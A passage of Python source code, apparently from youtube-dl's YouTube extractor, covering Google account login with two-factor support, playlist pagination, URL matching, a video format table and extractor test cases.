_PLAYLIST_ID_RE = r'(?:PL|LL|EC|UU|FL|RD|UL|TL|OLAK5uy_)[0-9A-Za-z-_]{10,}'
def _set_language(self):
self._set_cookie(
'.youtube.com', 'PREF', 'f1=50000000&hl=en',
# YouTube sets the expire time to about two months
expire_time=time.time() + 2 * 30 * 24 * 3600)
def _ids_to_results(self, ids):
return [
self.url_result(vid_id, 'Youtube', video_id=vid_id)
for vid_id in ids]
def _login(self):
"""
Attempt to log in to YouTube.
True is returned if successful or skipped.
False is returned if login failed.
If _LOGIN_REQUIRED is set and no authentication was provided, an error is raised.
"""
username, password = self._get_login_info()
# No authentication to be performed
if username is None:
if self._LOGIN_REQUIRED and self._downloader.params.get('cookiefile') is None:
raise ExtractorError('No login info available, needed for using %s.' % self.IE_NAME, expected=True)
return True
login_page = self._download_webpage(
self._LOGIN_URL, None,
note='Downloading login page',
errnote='unable to fetch login page', fatal=False)
if login_page is False:
return
login_form = self._hidden_inputs(login_page)
def req(url, f_req, note, errnote):
data = login_form.copy()
data.update({
'pstMsg': 1,
'checkConnection': 'youtube',
'checkedDomains': 'youtube',
'hl': 'en',
'deviceinfo': '[null,null,null,[],null,"US",null,null,[],"GlifWebSignIn",null,[null,null,[]]]',
'f.req': json.dumps(f_req),
'flowName': 'GlifWebSignIn',
'flowEntry': 'ServiceLogin',
})
return self._download_json(
url, None, note=note, errnote=errnote,
transform_source=lambda s: re.sub(r'^[^[]*', '', s),
fatal=False,
data=urlencode_postdata(data), headers={
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
'Google-Accounts-XSRF': 1,
})
def warn(message):
self._downloader.report_warning(message)
lookup_req = [
username,
None, [], None, 'US', None, None, 2, False, True,
[
None, None,
[2, 1, None, 1,
'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn',
None, [], 4],
1, [None, None, []], None, None, None, True
],
username,
]
lookup_results = req(
self._LOOKUP_URL, lookup_req,
'Looking up account info', 'Unable to look up account info')
if lookup_results is False:
return False
user_hash = try_get(lookup_results, lambda x: x[0][2], compat_str)
if not user_hash:
warn('Unable to extract user hash')
return False
challenge_req = [
user_hash,
None, 1, None, [1, None, None, None, [password, None, True]],
[
None, None, [2, 1, None, 1, 'https://accounts.google.com/ServiceLogin?passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Fnext%3D%252F%26action_handle_signin%3Dtrue%26hl%3Den%26app%3Ddesktop%26feature%3Dsign_in_button&hl=en&service=youtube&uilel=3&requestPath=%2FServiceLogin&Page=PasswordSeparationSignIn', None, [], 4],
1, [None, None, []], None, None, None, True
]]
challenge_results = req(
self._CHALLENGE_URL, challenge_req,
'Logging in', 'Unable to log in')
if challenge_results is False:
return
login_res = try_get(challenge_results, lambda x: x[0][5], list)
if login_res:
login_msg = try_get(login_res, lambda x: x[5], compat_str)
warn(
'Unable to login: %s' % 'Invalid password'
if login_msg == 'INCORRECT_ANSWER_ENTERED' else login_msg)
return False
res = try_get(challenge_results, lambda x: x[0][-1], list)
if not res:
warn('Unable to extract result entry')
return False
login_challenge = try_get(res, lambda x: x[0][0], list)
if login_challenge:
challenge_str = try_get(login_challenge, lambda x: x[2], compat_str)
if challenge_str == 'TWO_STEP_VERIFICATION':
# SEND_SUCCESS - TFA code has been successfully sent to phone
# QUOTA_EXCEEDED - reached the limit of TFA codes
status = try_get(login_challenge, lambda x: x[5], compat_str)
if status == 'QUOTA_EXCEEDED':
warn('Exceeded the limit of TFA codes, try later')
return False
tl = try_get(challenge_results, lambda x: x[1][2], compat_str)
if not tl:
warn('Unable to extract TL')
return False
tfa_code = self._get_tfa_info('2-step verification code')
if not tfa_code:
warn(
'Two-factor authentication required. Provide it either interactively or with --twofactor <code>'
'(Note that only TOTP (Google Authenticator App) codes work at this time.)')
return False
tfa_code = remove_start(tfa_code, 'G-')
tfa_req = [
user_hash, None, 2, None,
[
9, None, None, None, None, None, None, None,
[None, tfa_code, True, 2]
]]
tfa_results = req(
self._TFA_URL.format(tl), tfa_req,
'Submitting TFA code', 'Unable to submit TFA code')
if tfa_results is False:
return False
tfa_res = try_get(tfa_results, lambda x: x[0][5], list)
if tfa_res:
tfa_msg = try_get(tfa_res, lambda x: x[5], compat_str)
warn(
'Unable to finish TFA: %s' % 'Invalid TFA code'
if tfa_msg == 'INCORRECT_ANSWER_ENTERED' else tfa_msg)
return False
check_cookie_url = try_get(
tfa_results, lambda x: x[0][-1][2], compat_str)
else:
CHALLENGES = {
'LOGIN_CHALLENGE': "This device isn't recognized. For your security, Google wants to make sure it's really you.",
'USERNAME_RECOVERY': 'Please provide additional information to aid in the recovery process.',
'REAUTH': "There is something unusual about your activity. For your security, Google wants to make sure it's really you.",
}
challenge = CHALLENGES.get(
challenge_str,
'%s returned error %s.' % (self.IE_NAME, challenge_str))
warn('%s\nGo to https://accounts.google.com/, login and solve a challenge.' % challenge)
return False
else:
check_cookie_url = try_get(res, lambda x: x[2], compat_str)
if not check_cookie_url:
warn('Unable to extract CheckCookie URL')
return False
check_cookie_results = self._download_webpage(
check_cookie_url, None, 'Checking cookie', fatal=False)
if check_cookie_results is False:
return False
if 'https://myaccount.google.com/' not in check_cookie_results:
warn('Unable to log in')
return False
return True
def _download_webpage_handle(self, *args, **kwargs):
kwargs.setdefault('query', {})['disable_polymer'] = 'true'
return super(YoutubeBaseInfoExtractor, self)._download_webpage_handle(
*args, **compat_kwargs(kwargs))
def _real_initialize(self):
if self._downloader is None:
return
self._set_language()
if not self._login():
return
class YoutubeEntryListBaseInfoExtractor(YoutubeBaseInfoExtractor):
# Extract entries from page with "Load more" button
def _entries(self, page, playlist_id):
more_widget_html = content_html = page
for page_num in itertools.count(1):
for entry in self._process_page(content_html):
yield entry
mobj = re.search(r'data-uix-load-more-href="/?(?P<more>[^"]+)"', more_widget_html)
if not mobj:
break
more = self._download_json(
'https://youtube.com/%s' % mobj.group('more'), playlist_id,
'Downloading page #%s' % page_num,
transform_source=uppercase_escape)
content_html = more['content_html']
if not content_html.strip():
# Some webpages show a "Load more" button but they don't
# have more videos
break
more_widget_html = more['load_more_widget_html']
class YoutubePlaylistBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for video_id, video_title in self.extract_videos_from_page(content):
yield self.url_result(video_id, 'Youtube', video_id, video_title)
def extract_videos_from_page(self, page):
ids_in_page = []
titles_in_page = []
for mobj in re.finditer(self._VIDEO_RE, page):
# The link with index 0 is not the first video of the playlist (not sure if still actual)
if 'index' in mobj.groupdict() and mobj.group('id') == '0':
continue
video_id = mobj.group('id')
video_title = unescapeHTML(mobj.group('title'))
if video_title:
video_title = video_title.strip()
try:
idx = ids_in_page.index(video_id)
if video_title and not titles_in_page[idx]:
titles_in_page[idx] = video_title
except ValueError:
ids_in_page.append(video_id)
titles_in_page.append(video_title)
return zip(ids_in_page, titles_in_page)
class YoutubePlaylistsBaseInfoExtractor(YoutubeEntryListBaseInfoExtractor):
def _process_page(self, content):
for playlist_id in orderedSet(re.findall(
r'<h3[^>]+class="[^"]*yt-lockup-title[^"]*"[^>]*><a[^>]+href="/?playlist\?list=([0-9A-Za-z-_]{10,})"',
content)):
yield self.url_result(
'https://www.youtube.com/playlist?list=%s' % playlist_id, 'YoutubePlaylist')
def _real_extract(self, url):
playlist_id = self._match_id(url)
webpage = self._download_webpage(url, playlist_id)
title = self._og_search_title(webpage, fatal=False)
return self.playlist_result(self._entries(webpage, playlist_id), playlist_id, title)
class YoutubeIE(YoutubeBaseInfoExtractor):
IE_DESC = 'YouTube.com'
_VALID_URL = r"""(?x)^
(
(?:https?://|//) # http(s):// or protocol-independent URL
(?:(?:(?:(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/|
(?:www\.)?deturl\.com/www\.youtube\.com/|
(?:www\.)?pwnyoutube\.com/|
(?:www\.)?hooktube\.com/|
(?:www\.)?yourepeat\.com/|
tube\.majestyc\.net/|
youtube\.googleapis\.com/) # the various hostnames, with wildcard subdomains
(?:.*?\#/)? # handle anchor (#/) redirect urls
(?: # the various things that can precede the ID:
(?:(?:v|embed|e)/(?!videoseries)) # v/ or embed/ or e/
|(?: # or the v= param in all its forms
(?:(?:watch|movie)(?:_popup)?(?:\.php)?/?)? # preceding watch(_popup|.php) or nothing (like /?v=xxxx)
(?:\?|\#!?) # the params delimiter ? or # or #!
(?:.*?[&;])?? # any other preceding param (like /?s=tuff&v=xxxx or ?s=tuff&v=V36LpHqtcDY)
v=
)
))
|(?:
youtu\.be| # just youtu.be/xxxx
vid\.plus| # or vid.plus/xxxx
zwearz\.com/watch| # or zwearz.com/watch/xxxx
)/
|(?:www\.)?cleanvideosearch\.com/media/action/yt/watch\?videoId=
)
)? # all until now is optional -> you can pass the naked ID
([0-9A-Za-z_-]{11}) # here is it! the YouTube video ID
(?!.*?\blist=
(?:
%(playlist_id)s| # combined list/video URLs are handled by the playlist IE
WL # WL are handled by the watch later IE
)
)
(?(1).+)? # if we found the ID, everything can follow
$""" % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_NEXT_URL_RE = r'[\?&]next_url=([^&]+)'
_formats = {
'5': {'ext': 'flv', 'width': 400, 'height': 240, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'6': {'ext': 'flv', 'width': 450, 'height': 270, 'acodec': 'mp3', 'abr': 64, 'vcodec': 'h263'},
'13': {'ext': '3gp', 'acodec': 'aac', 'vcodec': 'mp4v'},
'17': {'ext': '3gp', 'width': 176, 'height': 144, 'acodec': 'aac', 'abr': 24, 'vcodec': 'mp4v'},
'18': {'ext': 'mp4', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 96, 'vcodec': 'h264'},
'22': {'ext': 'mp4', 'width': 1280, 'height': 720, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'34': {'ext': 'flv', 'width': 640, 'height': 360, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'35': {'ext': 'flv', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# itag 36 videos are either 320x180 (BaW_jenozKc) or 320x240 (__2ABJjxzNo), abr varies as well
'36': {'ext': '3gp', 'width': 320, 'acodec': 'aac', 'vcodec': 'mp4v'},
'37': {'ext': 'mp4', 'width': 1920, 'height': 1080, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'38': {'ext': 'mp4', 'width': 4096, 'height': 3072, 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264'},
'43': {'ext': 'webm', 'width': 640, 'height': 360, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'44': {'ext': 'webm', 'width': 854, 'height': 480, 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8'},
'45': {'ext': 'webm', 'width': 1280, 'height': 720, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'46': {'ext': 'webm', 'width': 1920, 'height': 1080, 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8'},
'59': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
'78': {'ext': 'mp4', 'width': 854, 'height': 480, 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264'},
# 3D videos
'82': {'ext': 'mp4', 'height': 360, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'83': {'ext': 'mp4', 'height': 480, 'format_note': '3D', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -20},
'84': {'ext': 'mp4', 'height': 720, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'85': {'ext': 'mp4', 'height': 1080, 'format_note': '3D', 'acodec': 'aac', 'abr': 192, 'vcodec': 'h264', 'preference': -20},
'100': {'ext': 'webm', 'height': 360, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 128, 'vcodec': 'vp8', 'preference': -20},
'101': {'ext': 'webm', 'height': 480, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
'102': {'ext': 'webm', 'height': 720, 'format_note': '3D', 'acodec': 'vorbis', 'abr': 192, 'vcodec': 'vp8', 'preference': -20},
# Apple HTTP Live Streaming
'91': {'ext': 'mp4', 'height': 144, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'92': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'93': {'ext': 'mp4', 'height': 360, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'94': {'ext': 'mp4', 'height': 480, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 128, 'vcodec': 'h264', 'preference': -10},
'95': {'ext': 'mp4', 'height': 720, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'96': {'ext': 'mp4', 'height': 1080, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 256, 'vcodec': 'h264', 'preference': -10},
'132': {'ext': 'mp4', 'height': 240, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 48, 'vcodec': 'h264', 'preference': -10},
'151': {'ext': 'mp4', 'height': 72, 'format_note': 'HLS', 'acodec': 'aac', 'abr': 24, 'vcodec': 'h264', 'preference': -10},
# DASH mp4 video
'133': {'ext': 'mp4', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'h264'},
'134': {'ext': 'mp4', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'h264'},
'135': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'136': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264'},
'137': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264'},
'138': {'ext': 'mp4', 'format_note': 'DASH video', 'vcodec': 'h264'}, # Height can vary (https://github.com/rg3/youtube-dl/issues/4559)
'160': {'ext': 'mp4', 'height': 144, 'format_note': 'DASH video', 'vcodec': 'h264'},
'212': {'ext': 'mp4', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'h264'},
'264': {'ext': 'mp4', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'h264'},
'298': {'ext': 'mp4', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'299': {'ext': 'mp4', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'h264', 'fps': 60},
'266': {'ext': 'mp4', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'h264'},
# Dash mp4 audio
'139': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 48, 'container': 'm4a_dash'},
'140': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 128, 'container': 'm4a_dash'},
'141': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'abr': 256, 'container': 'm4a_dash'},
'256': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'258': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'aac', 'container': 'm4a_dash'},
'325': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'dtse', 'container': 'm4a_dash'},
'328': {'ext': 'm4a', 'format_note': 'DASH audio', 'acodec': 'ec-3', 'container': 'm4a_dash'},
# Dash webm
'167': {'ext': 'webm', 'height': 360, 'width': 640, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'168': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'169': {'ext': 'webm', 'height': 720, 'width': 1280, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'170': {'ext': 'webm', 'height': 1080, 'width': 1920, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'218': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'219': {'ext': 'webm', 'height': 480, 'width': 854, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp8'},
'278': {'ext': 'webm', 'height': 144, 'format_note': 'DASH video', 'container': 'webm', 'vcodec': 'vp9'},
'242': {'ext': 'webm', 'height': 240, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'243': {'ext': 'webm', 'height': 360, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'244': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'245': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'246': {'ext': 'webm', 'height': 480, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'247': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'248': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'271': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9'},
# itag 272 videos are either 3840x2160 (e.g. RtoitU2A-3E) or 7680x4320 (sLprVF6d7Ug)
'272': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'302': {'ext': 'webm', 'height': 720, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'303': {'ext': 'webm', 'height': 1080, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'308': {'ext': 'webm', 'height': 1440, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
'313': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9'},
'315': {'ext': 'webm', 'height': 2160, 'format_note': 'DASH video', 'vcodec': 'vp9', 'fps': 60},
# Dash webm audio
'171': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 128},
'172': {'ext': 'webm', 'acodec': 'vorbis', 'format_note': 'DASH audio', 'abr': 256},
# Dash webm audio with opus inside
'249': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 50},
'250': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 70},
'251': {'ext': 'webm', 'format_note': 'DASH audio', 'acodec': 'opus', 'abr': 160},
# RTMP (unnamed)
'_rtmp': {'protocol': 'rtmp'},
}
_SUBTITLE_FORMATS = ('ttml', 'vtt')
_GEO_BYPASS = False
IE_NAME = 'youtube'
_TESTS = [
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&t=1s&end=9',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'license': 'Standard YouTube License',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact [email protected] .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'like_count': int,
'dislike_count': int,
'start_time': 1,
'end_time': 9,
}
},
{
'url': 'https://www.youtube.com/watch?v=UxxajLWwzqY',
'note': 'Test generic use_cipher_signature video (#897)',
'info_dict': {
'id': 'UxxajLWwzqY',
'ext': 'mp4',
'upload_date': '20120506',
'title': 'Icona Pop - I Love It (feat. Charli XCX) [OFFICIAL VIDEO]',
'alt_title': 'I Love It (feat. Charli XCX)',
'description': 'md5:f3ceb5ef83a08d95b9d146f973157cc8',
'tags': ['Icona Pop i love it', 'sweden', 'pop music', 'big beat records', 'big beat', 'charli',
'xcx', 'charli xcx', 'girls', 'hbo', 'i love it', "i don't care", 'icona', 'pop',
'iconic ep', 'iconic', 'love', 'it'],
'duration': 180,
'uploader': 'Icona Pop',
'uploader_id': 'IconaPop',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IconaPop',
'license': 'Standard YouTube License',
'creator': 'Icona Pop',
'track': 'I Love It (feat. Charli XCX)',
'artist': 'Icona Pop',
}
},
{
'url': 'https://www.youtube.com/watch?v=07FYdnEawAQ',
'note': 'Test VEVO video with age protection (#956)',
'info_dict': {
'id': '07FYdnEawAQ',
'ext': 'mp4',
'upload_date': '20130703',
'title': 'Justin Timberlake - Tunnel Vision (Explicit)',
'alt_title': 'Tunnel Vision',
'description': 'md5:64249768eec3bc4276236606ea996373',
'duration': 419,
'uploader': 'justintimberlakeVEVO',
'uploader_id': 'justintimberlakeVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/justintimberlakeVEVO',
'license': 'Standard YouTube License',
'creator': 'Justin Timberlake',
'track': 'Tunnel Vision',
'artist': 'Justin Timberlake',
'age_limit': 18,
}
},
{
'url': '//www.YouTube.com/watch?v=yZIXLfi8CZQ',
'note': 'Embed-only video (#1746)',
'info_dict': {
'id': 'yZIXLfi8CZQ',
'ext': 'mp4',
'upload_date': '20120608',
'title': 'Principal Sexually Assaults A Teacher - Episode 117 - 8th June 2012',
'description': 'md5:09b78bd971f1e3e289601dfba15ca4f7',
'uploader': 'SET India',
'uploader_id': 'setindia',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/setindia',
'license': 'Standard YouTube License',
'age_limit': 18,
}
},
{
'url': 'https://www.youtube.com/watch?v=BaW_jenozKc&v=UxxajLWwzqY',
'note': 'Use the first video ID in the URL',
'info_dict': {
'id': 'BaW_jenozKc',
'ext': 'mp4',
'title': 'youtube-dl test video "\'/\\ä↭𝕐',
'uploader': 'Philipp Hagemeister',
'uploader_id': 'phihag',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/phihag',
'upload_date': '20121002',
'license': 'Standard YouTube License',
'description': 'test chars: "\'/\\ä↭𝕐\ntest URL: https://github.com/rg3/youtube-dl/issues/1892\n\nThis is a test video for youtube-dl.\n\nFor more information, contact [email protected] .',
'categories': ['Science & Technology'],
'tags': ['youtube-dl'],
'duration': 10,
'like_count': int,
'dislike_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?v=a9LDPn-MO4I',
'note': '256k DASH audio (format 141) via DASH manifest',
'info_dict': {
'id': 'a9LDPn-MO4I',
'ext': 'm4a',
'upload_date': '20121002',
'uploader_id': '8KVIDEO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/8KVIDEO',
'description': '',
'uploader': '8KVIDEO',
'license': 'Standard YouTube License',
'title': 'UHDTV TEST 8K VIDEO.mp4'
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141',
},
'skip': 'format 141 not served anymore',
},
# DASH manifest with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=IB3lcPjvWLA',
'info_dict': {
'id': 'IB3lcPjvWLA',
'ext': 'm4a',
'title': 'Afrojack, Spree Wilson - The Spark ft. Spree Wilson',
'description': 'md5:1900ed86ee514927b9e00fbead6969a5',
'duration': 244,
'uploader': 'AfrojackVEVO',
'uploader_id': 'AfrojackVEVO',
'upload_date': '20131011',
'license': 'Standard YouTube License',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# JS player signature function name containing $
{
'url': 'https://www.youtube.com/watch?v=nfWlot6h_JM',
'info_dict': {
'id': 'nfWlot6h_JM',
'ext': 'm4a',
'title': 'Taylor Swift - Shake It Off',
'alt_title': 'Shake It Off',
'description': 'md5:95f66187cd7c8b2c13eb78e1223b63c3',
'duration': 242,
'uploader': 'TaylorSwiftVEVO',
'uploader_id': 'TaylorSwiftVEVO',
'upload_date': '20140818',
'license': 'Standard YouTube License',
'creator': 'Taylor Swift',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '141/bestaudio[ext=m4a]',
},
},
# Controversy video
{
'url': 'https://www.youtube.com/watch?v=T4XJQO3qol8',
'info_dict': {
'id': 'T4XJQO3qol8',
'ext': 'mp4',
'duration': 219,
'upload_date': '20100909',
'uploader': 'TJ Kirk',
'uploader_id': 'TheAmazingAtheist',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/TheAmazingAtheist',
'license': 'Standard YouTube License',
'title': 'Burning Everyone\'s Koran',
'description': 'SUBSCRIBE: http://www.youtube.com/saturninefilms\n\nEven Obama has taken a stand against freedom on this issue: http://www.huffingtonpost.com/2010/09/09/obama-gma-interview-quran_n_710282.html',
}
},
# Normal age-gate video (No vevo, embed allowed)
{
'url': 'https://youtube.com/watch?v=HtVdAasjOgU',
'info_dict': {
'id': 'HtVdAasjOgU',
'ext': 'mp4',
'title': 'The Witcher 3: Wild Hunt - The Sword Of Destiny Trailer',
'description': r're:(?s).{100,}About the Game\n.*?The Witcher 3: Wild Hunt.{100,}',
'duration': 142,
'uploader': 'The Witcher',
'uploader_id': 'WitcherGame',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/WitcherGame',
'upload_date': '20140605',
'license': 'Standard YouTube License',
'age_limit': 18,
},
},
# Age-gate video with encrypted signature
{
'url': 'https://www.youtube.com/watch?v=6kLq3WMV1nU',
'info_dict': {
'id': '6kLq3WMV1nU',
'ext': 'webm',
'title': 'Dedication To My Ex (Miss That) (Lyric Video)',
'description': 'md5:33765bb339e1b47e7e72b5490139bb41',
'duration': 246,
'uploader': 'LloydVEVO',
'uploader_id': 'LloydVEVO',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/LloydVEVO',
'upload_date': '20110629',
'license': 'Standard YouTube License',
'age_limit': 18,
},
},
# video_info is None (https://github.com/rg3/youtube-dl/issues/4421)
# YouTube Red ad is not captured for creator
{
'url': '__2ABJjxzNo',
'info_dict': {
'id': '__2ABJjxzNo',
'ext': 'mp4',
'duration': 266,
'upload_date': '20100430',
'uploader_id': 'deadmau5',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/deadmau5',
'creator': 'deadmau5',
'description': 'md5:12c56784b8032162bb936a5f76d55360',
'uploader': 'deadmau5',
'license': 'Standard YouTube License',
'title': 'Deadmau5 - Some Chords (HD)',
'alt_title': 'Some Chords',
},
'expected_warnings': [
'DASH manifest missing',
]
},
# Olympics (https://github.com/rg3/youtube-dl/issues/4431)
{
'url': 'lqQg6PlCWgI',
'info_dict': {
'id': 'lqQg6PlCWgI',
'ext': 'mp4',
'duration': 6085,
'upload_date': '20150827',
'uploader_id': 'olympic',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/olympic',
'license': 'Standard YouTube License',
'description': 'HO09 - Women - GER-AUS - Hockey - 31 July 2012 - London 2012 Olympic Games',
'uploader': 'Olympic',
'title': 'Hockey - Women - GER-AUS - London 2012 Olympic Games',
},
'params': {
'skip_download': 'requires avconv',
}
},
# Non-square pixels
{
'url': 'https://www.youtube.com/watch?v=_b-2C3KPAM0',
'info_dict': {
'id': '_b-2C3KPAM0',
'ext': 'mp4',
'stretched_ratio': 16 / 9.,
'duration': 85,
'upload_date': '20110310',
'uploader_id': 'AllenMeow',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/AllenMeow',
'description': 'made by Wacom from Korea | 字幕&加油添醋 by TY\'s Allen | 感謝heylisa00cavey1001同學熱情提供梗及翻譯',
'uploader': '孫ᄋᄅ',
'license': 'Standard YouTube License',
'title': '[A-made] 變態妍字幕版 太妍 我就是這樣的人',
},
},
# url_encoded_fmt_stream_map is empty string
{
'url': 'qEJwOuvDf7I',
'info_dict': {
'id': 'qEJwOuvDf7I',
'ext': 'webm',
'title': 'Обсуждение судебной практики по выборам 14 сентября 2014 года в Санкт-Петербурге',
'description': '',
'upload_date': '20150404',
'uploader_id': 'spbelect',
'uploader': 'Наблюдатели Петербурга',
},
'params': {
'skip_download': 'requires avconv',
},
'skip': 'This live event has ended.',
},
# Extraction from multiple DASH manifests (https://github.com/rg3/youtube-dl/pull/6097)
{
'url': 'https://www.youtube.com/watch?v=FIl7x6_3R5Y',
'info_dict': {
'id': 'FIl7x6_3R5Y',
'ext': 'webm',
'title': 'md5:7b81415841e02ecd4313668cde88737a',
'description': 'md5:116377fd2963b81ec4ce64b542173306',
'duration': 220,
'upload_date': '20150625',
'uploader_id': 'dorappi2000',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/dorappi2000',
'uploader': 'dorappi2000',
'license': 'Standard YouTube License',
'formats': 'mincount:31',
},
'skip': 'not actual anymore',
},
# DASH manifest with segment_list
{
'url': 'https://www.youtube.com/embed/CsmdDsKjzN8',
'md5': '8ce563a1d667b599d21064e982ab9e31',
'info_dict': {
'id': 'CsmdDsKjzN8',
'ext': 'mp4',
'upload_date': '20150501', # According to '<meta itemprop="datePublished"', but in other places it's 20150510
'uploader': 'Airtek',
'description': 'Retransmisión en directo de la XVIII media maratón de Zaragoza.',
'uploader_id': 'UCzTzUmjXxxacNnL8I3m4LnQ',
'license': 'Standard YouTube License',
'title': 'Retransmisión XVIII Media maratón Zaragoza 2015',
},
'params': {
'youtube_include_dash_manifest': True,
'format': '135', # bestvideo
},
'skip': 'This live event has ended.',
},
{
# Multifeed videos (multiple cameras), URL is for Main Camera
'url': 'https://www.youtube.com/watch?v=jqWvoWXjCVs',
'info_dict': {
'id': 'jqWvoWXjCVs',
'title': 'teamPGP: Rocket League Noob Stream',
